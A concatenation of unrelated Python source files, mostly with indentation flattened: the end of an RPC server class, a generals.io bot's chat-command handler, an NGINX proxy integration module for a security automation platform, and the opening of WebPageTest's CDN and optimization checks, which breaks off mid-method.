if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
self.logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr, silent))
            self.proc.daemon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library, silent))
            self.proc.daemon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
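# A minimal usage sketch (not part of the original module): start an RPC server
# bound to all interfaces and stop it again. The port value is illustrative.
def _example_start_server():
    srv = Server("0.0.0.0", port=9091)
    time.sleep(1.0)
    srv.terminate()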
|
bot_cmds.py
|
"""
@ Harris Christiansen (code@HarrisChristiansen.com)
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Generals.io Bot Commands
"""
import random
import threading
import time
from .constants import *
from . import generals_api
class BotCommands(object):
def __init__(self, bot):
self._bot = bot
self._permitted_username = ""
self._map = None
def set_map(self, game_map):
self._map = game_map
# ======================== Bot Commands ======================== #
def _get_command(self, msg, is_from_chat, username):
msg_lower = msg.lower()
command = msg.split(' ')
command_len = len(command)
if command_len == 1:
command = command[0].split(':') # Handle : delimiters
base_command = command[0].lower()
arg_command = " ".join(command[1:])
# Handle directed commands (ex: myssix pause)
if command_len > 1 and "_map" in dir(self) and "usernames" in dir(self._map):
if base_command == self._map.usernames[self._map.player_index].lower():
command = command[1:]
command_len = len(command)
base_command = command[0].lower()
arg_command = " ".join(command[1:])
return msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username
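    # Illustrative example (not part of the original file): for the chat message
    # "speed 4" sent by user "alice", _get_command returns
    # ("speed 4", "speed 4", ["speed", "4"], 2, "speed", "4", True, "alice").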
def handle_command(self, msg, is_from_chat=False, username=""):
command_list = self._get_command(msg, is_from_chat, username)
if self._handle_start_command(command_list):
return True
if self._handle_chat_command(command_list):
return True
if self._handle_unrestricted_command(command_list):
return True
if self._handle_restricted_command(command_list):
return True
return False
def _handle_start_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if len(msg) < 12 and any(k in msg_lower for k in START_KEYWORDS):
self._bot.send_forcestart(delay=0)
self._bot.is_paused = False
return True
if len(msg) < 2:
return True
return False
def _handle_chat_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if self._handle_player_command(msg, username):
return True
if base_command.startswith(tuple(HELP_KEYWORDS)):
self._print_command_help(is_from_chat)
return True
if base_command.startswith(tuple(HELLO_KEYWORDS)):
self._print_command_hello()
return True
return False
def _handle_unrestricted_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "setup" in base_command:
self._bot.set_game_speed(4)
self._set_game_map()
self._bot.set_game_public()
return True
if "speed" in base_command and command_len >= 2 and command[1][0].isdigit():
self._bot.set_game_speed(command[1][0])
return True
if "public" in base_command:
self._bot.set_game_public()
return True
return False
def _handle_restricted_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if self._permitted_username != "" and self._permitted_username != username: # Only allow permitted user
return False
if self._handle_setup_command(command_list):
return True
if self._handle_game_command(command_list):
return True
return False
def _handle_setup_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "map" in base_command:
if command_len >= 2:
self._set_game_map(arg_command)
else:
self._set_game_map()
return True
elif "normal" in base_command:
self._set_normal_map()
return True
elif "maxsize" in base_command:
self._bot.set_normal_map(width=1.0, height=1.0)
return True
elif "mincity" in base_command:
self._bot.set_normal_map(city=0.0)
return True
elif "maxcity" in base_command:
self._bot.set_normal_map(city=1.0)
return True
elif "minmountain" in base_command:
self._bot.set_normal_map(mountain=0.0)
return True
elif "maxmountain" in base_command:
self._bot.set_normal_map(mountain=1.0)
return True
elif "maxswamp" in base_command:
self._bot.set_normal_map(swamp=1.0)
return True
elif "maxall" in base_command:
self._bot.set_normal_map(1.0, 1.0, 1.0, 1.0, 1.0)
return True
elif "width" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(width=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(width=1.0)
return True
elif "height" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(height=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(height=1.0)
return True
elif "city" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(city=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(city=1.0)
return True
elif "mountain" in base_command:
if command_len == 2:
try:
self._bot.set_normal_map(mountain=float(arg_command))
return True
except ValueError:
pass
self._bot.set_normal_map(mountain=1.0)
return True
elif "swamp" in base_command:
if command_len == 2:
try:
self._set_swamp_map(float(arg_command))
return True
except ValueError:
pass
self._set_swamp_map()
return True
elif is_from_chat and len(msg) < 12 and "map" in msg_lower:
self._set_game_map()
return True
return False
def _handle_game_command(self, command_list):
(msg, msg_lower, command, command_len, base_command, arg_command, is_from_chat, username) = command_list
if "take" in base_command and username != "":
self._permitted_username = username
elif "team" in base_command:
if command_len >= 2:
if len(command[1]) == 1:
self._bot.set_game_team(command[1])
else:
return self._add_teammate(arg_command)
elif base_command in ["unteamall"]:
self._remove_all_teammates()
elif base_command in ["unteam", "cancelteam"]:
self._remove_teammate(username)
elif base_command in ["noteam"]:
_spawn(self._start_avoiding_team)
else:
return self._add_teammate(username)
return True
elif "bye!" in base_command:
if "_map" in dir(self):
# self._map.exit_on_game_over = False # Wait 2 minutes before exiting
self._bot.send_surrender()
return True
elif "unpause" in base_command:
self._bot.is_paused = False
return True
elif "pause" in base_command:
self._bot.is_paused = True
return True
return False
# ======================== Sending Messages ======================== #
def _print_command_help(self, is_from_chat=False):
if is_from_chat:
self._bot.sent_hello = True
for txt in GAME_HELP_TEXT if "_map" in dir(self) else PRE_HELP_TEXT:
self._bot.send_chat(txt)
time.sleep(0.34)
else:
print("\n".join(GAME_HELP_TEXT if "_map" in dir(self) else PRE_HELP_TEXT))
def _print_command_hello(self):
if "sent_hello" in dir(self._bot):
return True
self._bot.sent_hello = True
for txt in GAME_HELLO_TEXT if "_map" in dir(self) else HELLO_TEXT:
self._bot.send_chat(txt)
time.sleep(0.34)
# ======================== Teammates ======================== #
def _add_teammate(self, username):
if "_map" in dir(self) and "usernames" in dir(self._map):
if username != "" and username != self._map.usernames[self._map.player_index] and \
username in self._map.usernames:
self._map.do_not_attack_players.append(self._map.usernames.index(username))
return True
return False
def _remove_teammate(self, username):
if "_map" in dir(self) and "usernames" in dir(self._map):
if username != "" and username != self._map.usernames[self._map.player_index]:
if self._map.usernames.index(username) in self._map.do_not_attack_players:
self._map.do_not_attack_players.remove(self._map.usernames.index(username))
return True
return False
def _remove_all_teammates(self):
self._map.do_not_attack_players = []
return True
def _start_avoiding_team(self):
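# Poll the lobby's team assignments; whenever the bot shares a team with another
# player, hop to the lowest-numbered team that is currently empty.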
while True:
if "teams" not in dir(self._bot):
time.sleep(0.1)
continue
for i, members in self._bot.teams.items():
if self._bot.username in members:
if len(members) > 1:  # More than 1 person on the bot's team
for team in range(1, MAX_NUM_TEAMS + 1):
if team not in self._bot.teams:
self._bot.set_game_team(team)
break
time.sleep(0.1)
# ======================== Set Custom Gamemap ======================== #
def _set_game_map(self, map_name=""):
if len(map_name) > 1:
map_lower = map_name.lower()
if map_lower in ["win", "good"]:
self._bot.set_game_map(random.choice(GENERALS_MAPS))
elif map_lower == "top":
self._bot.set_game_map(random.choice(generals_api.list_top()))
elif map_lower == "hot":
self._bot.set_game_map(random.choice(generals_api.list_hot()))
else:
maps = generals_api.list_search(map_name)
if map_name in maps:
self._bot.set_game_map(map_name)
elif len(maps) >= 1:
self._bot.set_game_map(maps[0])
self._bot.send_chat("I could not find " + map_name + ", so I set the map to " + maps[
0] + " (Note: names are case sensitive)")
else:
self._bot.send_chat("Could not find map named " + map_name + " (Note: names are case sensitive)")
else:
self._bot.set_game_map(random.choice(generals_api.list_both()))
def _set_normal_map(self):
width = round(random.uniform(0, 1), 2)
height = round(random.uniform(0, 1), 2)
city = round(random.uniform(0, 1), 2)
mountain = round(random.uniform(0, 1), 2)
self._bot.set_normal_map(width, height, city, mountain)
def _set_swamp_map(self, swamp=-1):
if swamp == -1:
swamp = round(random.uniform(0, 1), 2)
if 0 <= swamp <= 1:
self._bot.set_normal_map(swamp=swamp)
# ======================== Player Requested Commands ======================== #
def _handle_player_command(self, msg, username):
if "boomer" in username.lower():
self._bot.send_chat("Okay Boomer <3")
return True
return False
def _spawn(f):
t = threading.Thread(target=f)
t.daemon = True
t.start()
|
NGINXApiModule.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
from multiprocessing import Process
from gevent.pywsgi import WSGIServer
import subprocess
import gevent
from signal import SIGUSR1
import requests
from flask.logging import default_handler
from typing import Any, Dict
import os
import traceback
from string import Template
class Handler:
@staticmethod
def write(msg: str):
demisto.info(msg)
class ErrorHandler:
@staticmethod
def write(msg: str):
demisto.error(f'wsgi error: {msg}')
DEMISTO_LOGGER: Handler = Handler()
ERROR_LOGGER: ErrorHandler = ErrorHandler()
# nginx server params
NGINX_SERVER_ACCESS_LOG = '/var/log/nginx/access.log'
NGINX_SERVER_ERROR_LOG = '/var/log/nginx/error.log'
NGINX_SERVER_CONF_FILE = '/etc/nginx/conf.d/default.conf'
NGINX_SSL_KEY_FILE = '/etc/nginx/ssl/ssl.key'
NGINX_SSL_CRT_FILE = '/etc/nginx/ssl/ssl.crt'
NGINX_SSL_CERTS = f'''
ssl_certificate {NGINX_SSL_CRT_FILE};
ssl_certificate_key {NGINX_SSL_KEY_FILE};
'''
NGINX_SERVER_CONF = '''
server {
listen $port default_server $ssl;
$sslcerts
proxy_cache_key $scheme$proxy_host$request_uri$extra_cache_key;
$proxy_set_range_header
# Static test file
location = /nginx-test {
alias /var/lib/nginx/html/index.html;
default_type text/html;
}
# Proxy everything to python
location / {
proxy_pass http://localhost:$serverport/;
add_header X-Proxy-Cache $upstream_cache_status;
# allow bypassing the cache with an arg of nocache=1 ie http://server:7000/?nocache=1
proxy_cache_bypass $arg_nocache;
proxy_read_timeout 1800;
proxy_connect_timeout 1800;
proxy_send_timeout 1800;
send_timeout 1800;
}
}
'''
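# For illustration only (port values are assumptions, not taken from a live config):
# with port=7000 (so serverport=7001), no TLS and no extra cache keys, the
# safe_substitute() call below leaves nginx's own $variables intact and yields roughly:
#
#   server {
#       listen 7000 default_server ;
#       proxy_cache_key $scheme$proxy_host$request_uri;
#       location = /nginx-test { ... }
#       location / {
#           proxy_pass http://localhost:7001/;
#           ...
#       }
#   }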
def create_nginx_server_conf(file_path: str, port: int, params: Dict):
"""Create nginx conf file
Args:
file_path (str): path of server conf file
port (int): listening port. server port to proxy to will be port+1
params (Dict): additional nginx params
Raises:
DemistoException: raised if there is a detected config error
"""
params = demisto.params() if not params else params
template_str = params.get('nginx_server_conf') or NGINX_SERVER_CONF
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
ssl = ''
sslcerts = ''
serverport = port + 1
proxy_set_range_header = ''
extra_cache_keys = []
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
demisto.debug('Using HTTPS for nginx conf')
with open(NGINX_SSL_CRT_FILE, 'wt') as f:
f.write(certificate)
with open(NGINX_SSL_KEY_FILE, 'wt') as f:
f.write(private_key)
ssl = 'ssl' # to be included in the listen directive
sslcerts = NGINX_SSL_CERTS
credentials = params.get('credentials') or {}
if credentials.get('identifier'):
extra_cache_keys.append("$http_authorization")
if get_integration_name() == 'TAXII2 Server':
extra_cache_keys.append("$http_accept")
if params.get('version') == '2.0':
proxy_set_range_header = 'proxy_set_header Range $http_range;'
extra_cache_keys.extend(['$http_range', '$http_content_range'])
extra_cache_keys_str = ''.join(extra_cache_keys)
server_conf = Template(template_str).safe_substitute(port=port, serverport=serverport, ssl=ssl,
sslcerts=sslcerts, extra_cache_key=extra_cache_keys_str,
proxy_set_range_header=proxy_set_range_header)
with open(file_path, mode='wt+') as f:
f.write(server_conf)
def start_nginx_server(port: int, params: Dict = {}) -> subprocess.Popen:
params = demisto.params() if not params else params
create_nginx_server_conf(NGINX_SERVER_CONF_FILE, port, params)
nginx_global_directives = 'daemon off;'
global_directives_conf = params.get('nginx_global_directives')
if global_directives_conf:
nginx_global_directives = f'{nginx_global_directives} {global_directives_conf}'
directive_args = ['-g', nginx_global_directives]
# we first do a test that all config is good and log it
try:
nginx_test_command = ['nginx', '-T']
nginx_test_command.extend(directive_args)
test_output = subprocess.check_output(nginx_test_command, stderr=subprocess.STDOUT, text=True)
demisto.info(f'nginx test passed. command: [{nginx_test_command}]')
demisto.debug(f'nginx test output:\n{test_output}')
except subprocess.CalledProcessError as err:
raise ValueError(f"Failed testing nginx conf. Return code: {err.returncode}. Output: {err.output}")
nginx_command = ['nginx']
nginx_command.extend(directive_args)
res = subprocess.Popen(nginx_command, text=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
demisto.info(f'done starting nginx with pid: {res.pid}')
return res
def nginx_log_process(nginx_process: subprocess.Popen):
try:
old_access = NGINX_SERVER_ACCESS_LOG + '.old'
old_error = NGINX_SERVER_ERROR_LOG + '.old'
log_access = False
log_error = False
# first check if one of the logs is missing. This may happen on rare occasions when we renamed and deleted the file
# before nginx completed the rollover of the logs
missing_log = False
if not os.path.isfile(NGINX_SERVER_ACCESS_LOG):
missing_log = True
demisto.info(f'Missing access log: {NGINX_SERVER_ACCESS_LOG}. Will send roll signal to nginx.')
if not os.path.isfile(NGINX_SERVER_ERROR_LOG):
missing_log = True
demisto.info(f'Missing error log: {NGINX_SERVER_ERROR_LOG}. Will send roll signal to nginx.')
if missing_log:
nginx_process.send_signal(int(SIGUSR1))
demisto.info(f'Done sending roll signal to nginx (pid: {nginx_process.pid}) after detecting missing log file.'
' Will skip this iteration.')
return
if os.path.getsize(NGINX_SERVER_ACCESS_LOG):
log_access = True
os.rename(NGINX_SERVER_ACCESS_LOG, old_access)
if os.path.getsize(NGINX_SERVER_ERROR_LOG):
log_error = True
os.rename(NGINX_SERVER_ERROR_LOG, old_error)
if log_access or log_error:
# nginx rolls the logs when getting sigusr1
nginx_process.send_signal(int(SIGUSR1))
gevent.sleep(0.5) # sleep 0.5 to let nginx complete the roll
if log_access:
with open(old_access, 'rt') as f:
start = 1
for lines in batch(f.readlines(), 100):
end = start + len(lines)
demisto.info(f'nginx access log ({start}-{end-1}): ' + ''.join(lines))
start = end
os.unlink(old_access)
if log_error:
with open(old_error, 'rt') as f:
start = 1
for lines in batch(f.readlines(), 100):
end = start + len(lines)
demisto.error(f'nginx error log ({start}-{end-1}): ' + ''.join(lines))
start = end
os.unlink(old_error)
except Exception as e:
demisto.error(f'Failed nginx log processing: {e}. Exception: {traceback.format_exc()}')
def nginx_log_monitor_loop(nginx_process: subprocess.Popen):
"""An endless loop to monitor nginx logs. Meant to be spawned as a greenlet.
Runs every minute and, when there is new log output, dumps the nginx logs and rolls them.
Args:
nginx_process (subprocess.Popen): the nginx process. Will send signal for log rolling.
"""
while True:
gevent.sleep(60)
nginx_log_process(nginx_process)
def test_nginx_server(port: int, params: Dict):
nginx_process = start_nginx_server(port, params)
# let nginx startup
time.sleep(0.5)
try:
protocol = 'https' if params.get('key') else 'http'
res = requests.get(f'{protocol}://localhost:{port}/nginx-test',
verify=False, proxies={"http": "", "https": ""}) # nosec guardrails-disable-line
res.raise_for_status()
welcome = 'Welcome to nginx'
if welcome not in res.text:
raise ValueError(f'Unexpected response from nginx-test (does not contain "{welcome}"): {res.text}')
finally:
try:
nginx_process.terminate()
nginx_process.wait(1.0)
except Exception as ex:
demisto.error(f'failed stopping test nginx process: {ex}')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def get_params_port(params: Dict = None) -> int:
"""
Gets port from the integration parameters
"""
params = demisto.params() if not params else params
port_mapping: str = params.get('longRunningPort', '')
err_msg: str
port: int
if port_mapping:
err_msg = f'Listen Port must be an integer. {port_mapping} is not valid.'
if ':' in port_mapping:
port = try_parse_integer(port_mapping.split(':')[1], err_msg)
else:
port = try_parse_integer(port_mapping, err_msg)
else:
raise ValueError('Please provide a Listen Port.')
return port
def run_long_running(params: Dict = None, is_test: bool = False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
params = demisto.params() if not params else params
nginx_process = None
nginx_log_monitor = None
try:
nginx_port = get_params_port()
server_port = nginx_port + 1
# set our own log handlers
APP.logger.removeHandler(default_handler) # type: ignore[name-defined] # pylint: disable=E0602
integration_logger = IntegrationLogger()
integration_logger.buffering = False
log_handler = DemistoHandler(integration_logger)
log_handler.setFormatter(
logging.Formatter("flask log: [%(asctime)s] %(levelname)s in %(module)s: %(message)s")
)
APP.logger.addHandler(log_handler) # type: ignore[name-defined] # pylint: disable=E0602
demisto.debug('done setting demisto handler for logging')
server = WSGIServer(('0.0.0.0', server_port),
APP, log=DEMISTO_LOGGER, # type: ignore[name-defined] # pylint: disable=E0602
error_log=ERROR_LOGGER)
if is_test:
test_nginx_server(nginx_port, params)
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
try:
server_process.terminate()
server_process.join(1.0)
except Exception as ex:
demisto.error(f'failed stopping test wsgi server process: {ex}')
else:
nginx_process = start_nginx_server(nginx_port, params)
nginx_log_monitor = gevent.spawn(nginx_log_monitor_loop, nginx_process)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred: {error_message}. Exception: {traceback.format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
raise ValueError(error_message)
finally:
if nginx_process:
try:
nginx_process.terminate()
except Exception as ex:
demisto.error(f'Failed stopping nginx process when exiting: {ex}')
if nginx_log_monitor:
try:
nginx_log_monitor.kill(timeout=1.0)
except Exception as ex:
demisto.error(f'Failed stopping nginx_log_monitor when exiting: {ex}')
|
optimization_checks.py
|
# Copyright 2019 WebPageTest LLC.
# Copyright 2017 Google Inc.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Run the various optimization checks"""
import binascii
import gzip
import logging
import multiprocessing
import os
import re
import shutil
import struct
import subprocess
import sys
import threading
import time
if (sys.version_info > (3, 0)):
from time import monotonic
GZIP_TEXT = 'wt'
unicode = str
else:
from monotonic import monotonic
GZIP_TEXT = 'w'
try:
import ujson as json
except BaseException:
import json
class OptimizationChecks(object):
"""Threaded optimization checks"""
def __init__(self, job, task, requests):
self.job = job
self.task = task
self.running_checks = False
self.requests = requests
self.cdn_thread = None
self.hosting_thread = None
self.gzip_thread = None
self.image_thread = None
self.progressive_thread = None
self.font_thread = None
self.cdn_time = None
self.hosting_time = None
self.gzip_time = None
self.image_time = None
self.progressive_time = None
self.font_time = None
self.cdn_results = {}
self.hosting_results = {}
self.gzip_results = {}
self.image_results = {}
self.progressive_results = {}
self.font_results = {}
self.results = {}
self.dns_lookup_queue = multiprocessing.JoinableQueue()
self.dns_result_queue = multiprocessing.JoinableQueue()
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
# spell-checker: disable
self.cdn_cnames = {
'Advanced Hosters CDN': ['.pix-cdn.org'],
'afxcdn.net': ['.afxcdn.net'],
'Akamai': ['.akamai.net',
'.akamaized.net',
'.akamaized-staging.net',
'.akamaiedge.net',
'.akamaiedge-staging.net',
'.akamaihd.net',
'.edgesuite.net',
'.edgesuite-staging.net',
'.edgekey.net',
'.edgekey-staging.net',
'.srip.net',
'.akamaitechnologies.com',
'.akamaitechnologies.fr'],
'Akamai China CDN': ['.tl88.net'],
'Alimama': ['.gslb.tbcache.com'],
'Amazon CloudFront': ['.cloudfront.net'],
'Aryaka': ['.aads1.net',
'.aads-cn.net',
'.aads-cng.net'],
'AT&T': ['.att-dsa.net'],
'Automattic': ['.wp.com',
'.wordpress.com',
'.gravatar.com'],
'Azion': ['.azioncdn.net',
'.azioncdn.com',
'.azion.net'],
'BelugaCDN': ['.belugacdn.com',
'.belugacdn.link'],
'Bison Grid': ['.bisongrid.net'],
'BitGravity': ['.bitgravity.com'],
'Blue Hat Network': ['.bluehatnetwork.com'],
'BO.LT': ['bo.lt'],
'BunnyCDN': ['.b-cdn.net'],
'Cachefly': ['.cachefly.net'],
'Caspowa': ['.caspowa.com'],
'Cedexis': ['.cedexis.net'],
'CDN77': ['.cdn77.net',
'.cdn77.org'],
'CDNetworks': ['.cdngc.net',
'.gccdn.net',
'.panthercdn.com'],
'CDNsun': ['.cdnsun.net'],
'CDNvideo': ['.cdnvideo.ru',
'.cdnvideo.net'],
'ChinaCache': ['.ccgslb.com'],
'ChinaNetCenter': ['.lxdns.com',
'.wscdns.com',
'.wscloudcdn.com',
'.ourwebpic.com'],
'Cloudflare': ['.cloudflare.com',
'.cloudflare.net'],
'Cotendo CDN': ['.cotcdn.net'],
'cubeCDN': ['.cubecdn.net'],
'Edgecast': ['edgecastcdn.net',
'.systemcdn.net',
'.transactcdn.net',
'.v1cdn.net',
'.v2cdn.net',
'.v3cdn.net',
'.v4cdn.net',
'.v5cdn.net'],
'Facebook': ['.facebook.com',
'.facebook.net',
'.fbcdn.net',
'.cdninstagram.com'],
'Fastly': ['.fastly.net',
'.fastlylb.net',
'.nocookie.net'],
'GoCache': ['.cdn.gocache.net'],
'Google': ['.google.',
'googlesyndication.',
'youtube.',
'.googleusercontent.com',
'googlehosted.com',
'.gstatic.com',
'.googleapis.com',
'.doubleclick.net'],
'HiberniaCDN': ['.hiberniacdn.com'],
'Highwinds': ['hwcdn.net'],
'Hosting4CDN': ['.hosting4cdn.com'],
'ImageEngine': ['.imgeng.in'],
'Incapsula': ['.incapdns.net'],
'Instart Logic': ['.insnw.net',
'.inscname.net'],
'Internap': ['.internapcdn.net'],
'jsDelivr': ['cdn.jsdelivr.net'],
'KeyCDN': ['.kxcdn.com'],
'KINX CDN': ['.kinxcdn.com',
'.kinxcdn.net'],
'LeaseWeb CDN': ['.lswcdn.net',
'.lswcdn.eu'],
'Level 3': ['.footprint.net',
'.fpbns.net'],
'Limelight': ['.llnwd.net',
'.llnw.net',
'.llnwi.net',
'.lldns.net'],
'MediaCloud': ['.cdncloud.net.au'],
'Medianova': ['.mncdn.com',
'.mncdn.net',
'.mncdn.org'],
'Microsoft Azure': ['.vo.msecnd.net',
'.azureedge.net',
'.azurefd.net',
'.azure.microsoft.com',
'-msedge.net'],
'Mirror Image': ['.instacontent.net',
'.mirror-image.net'],
'NetDNA': ['.netdna-cdn.com',
'.netdna-ssl.com',
'.netdna.com'],
'Netlify': ['.netlify.com'],
'NGENIX': ['.ngenix.net'],
'NYI FTW': ['.nyiftw.net',
'.nyiftw.com'],
'OnApp': ['.r.worldcdn.net',
'.r.worldssl.net'],
'Optimal CDN': ['.optimalcdn.com'],
'PageCDN': ['pagecdn.io'],
'PageRain': ['.pagerain.net'],
'Pressable CDN': ['.pressablecdn.com'],
'PUSHR': ['.pushrcdn.com'],
'Rackspace': ['.raxcdn.com'],
'Reapleaf': ['.rlcdn.com'],
'Reflected Networks': ['.rncdn1.com',
'.rncdn7.com'],
'ReSRC.it': ['.resrc.it'],
'Rev Software': ['.revcn.net',
'.revdn.net'],
'Roast.io': ['.roast.io'],
'Rocket CDN': ['.streamprovider.net'],
'section.io': ['.squixa.net'],
'SFR': ['cdn.sfr.net'],
'SwiftyCDN': ['.swiftycdn.net'],
'Simple CDN': ['.simplecdn.net'],
'Singular CDN': ['.singularcdn.net.br'],
'Sirv CDN': ['.sirv.com'],
'StackPath': ['.stackpathdns.com'],
'SwiftCDN': ['.swiftcdn1.com',
'.swiftserve.com'],
'Taobao': ['.gslb.taobao.com',
'tbcdn.cn',
'.taobaocdn.com'],
'Telenor': ['.cdntel.net'],
'TRBCDN': ['.trbcdn.net'],
'Twitter': ['.twimg.com'],
'UnicornCDN': ['.unicorncdn.net'],
'Universal CDN': ['.cdn12.com',
'.cdn13.com',
'.cdn15.com'],
'VegaCDN': ['.vegacdn.vn',
'.vegacdn.com'],
'VoxCDN': ['.voxcdn.net'],
'XLabs Security': ['.xlabs.com.br',
'.armor.zone'],
'Yahoo': ['.ay1.b.yahoo.com',
'.yimg.',
'.yahooapis.com'],
'Yottaa': ['.yottaa.net'],
'ZEIT Smart CDN': ['.zeit.co'],
'Zenedge': ['.zenedge.net']
}
self.cdn_headers = {
'Airee': [{'Server': 'Airee'}],
'Akamai': [{'x-akamai-staging': 'ESSL'},
{'x-akamai-request-id': ''}],
'Amazon CloudFront': [{'Via': 'CloudFront'}],
'Aryaka': [{'X-Ar-Debug': ''}],
'BelugaCDN': [{'Server': 'Beluga'},
{'X-Beluga-Cache-Status': ''}],
'BunnyCDN': [{'Server': 'BunnyCDN'}],
'Caspowa': [{'Server': 'Caspowa'}],
'CDN': [{'X-Edge-IP': ''},
{'X-Edge-Location': ''}],
'CDN77': [{'Server': 'CDN77'}],
'CDNetworks': [{'X-Px': ''}],
'ChinaNetCenter': [{'X-Cache': 'cache.51cdn.com'}],
'Cloudflare': [{'Server': 'cloudflare'}],
'Edgecast': [{'Server': 'ECS'},
{'Server': 'ECAcc'},
{'Server': 'ECD'}],
'Fastly': [{'X-Served-By': 'cache-', 'X-Cache': ''}],
'Fly': [{'Server': 'Fly.io'}],
'GoCache': [{'Server': 'gocache'}],
'Google': [{'Server': 'sffe'},
{'Server': 'gws'},
{'Server': 'ESF'},
{'Server': 'GSE'},
{'Server': 'Golfe2'},
{'Via': 'google'}],
'HiberniaCDN': [{'Server': 'hiberniacdn'}],
'Highwinds': [{'X-HW': ''}],
'Hosting4CDN': [{'x-cdn': 'H4CDN'}],
'ImageEngine': [{'Server': 'ScientiaMobile ImageEngine'}],
'Incapsula': [{'X-CDN': 'Incapsula'},
{'X-Iinfo': ''}],
'Instart Logic': [{'X-Instart-Request-ID': 'instart'}],
'LeaseWeb CDN': [{'Server': 'leasewebcdn'}],
'Medianova': [{'Server': 'MNCDN'}],
'Myra Security CDN': [{'Server': 'myracloud'}],
'Naver': [{'Server': 'Testa/'}],
'NetDNA': [{'Server': 'NetDNA'}],
'Netlify': [{'Server': 'Netlify'}],
'NGENIX': [{'x-ngenix-cache': ''}],
'NYI FTW': [{'X-Powered-By': 'NYI FTW'},
{'X-Delivered-By': 'NYI FTW'}],
'Optimal CDN': [{'Server': 'Optimal CDN'}],
'OVH CDN': [{'X-CDN-Geo': ''},
{'X-CDN-Pop': ''}],
'PageCDN': [{'X-CDN': 'PageCDN'}],
'PUSHR': [{'Via': 'PUSHR'}],
'QUIC.cloud': [{'X-QC-POP': '', 'X-QC-Cache': ''}],
'ReSRC.it': [{'Server': 'ReSRC'}],
'Rev Software': [{'Via': 'Rev-Cache'},
{'X-Rev-Cache': ''}],
'Roast.io': [{'Server': 'Roast.io'}],
'Rocket CDN': [{'x-rocket-node': ''}],
'section.io': [{'section-io-id': ''}],
'SwiftyCDN': [{'X-CDN': 'SwiftyCDN'}],
'Singular CDN': [{'Server': 'SingularCDN'}],
'Sirv CDN': [{'x-sirv-server': ''}],
'Sucuri Firewall': [{'Server': 'Sucuri/Cloudproxy'},
{'x-sucuri-id': ''}],
'Surge': [{'Server': 'SurgeCDN'}],
'Twitter': [{'Server': 'tsa_b'}],
'UnicornCDN': [{'Server': 'UnicornCDN'}],
'XLabs Security': [{'x-cdn': 'XLabs Security'}],
'Yunjiasu': [{'Server': 'yunjiasu'}],
'Zenedge': [{'X-Cdn': 'Zenedge'}],
'ZEIT Smart CDN': [{'Server': 'now'}],
'Zycada Networks': [{'X-Zy-Server': ''}]
}
# spell-checker: enable
def start(self):
"""Start running the optimization checks"""
logging.debug('Starting optimization checks...')
optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.font_thread = threading.Thread(target=self.check_fonts)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
self.font_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for font check to complete')
if self.font_thread is not None:
self.font_thread.join()
self.font_thread = None
if self.font_time is not None:
logging.debug("font check took %0.3f seconds", self.font_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
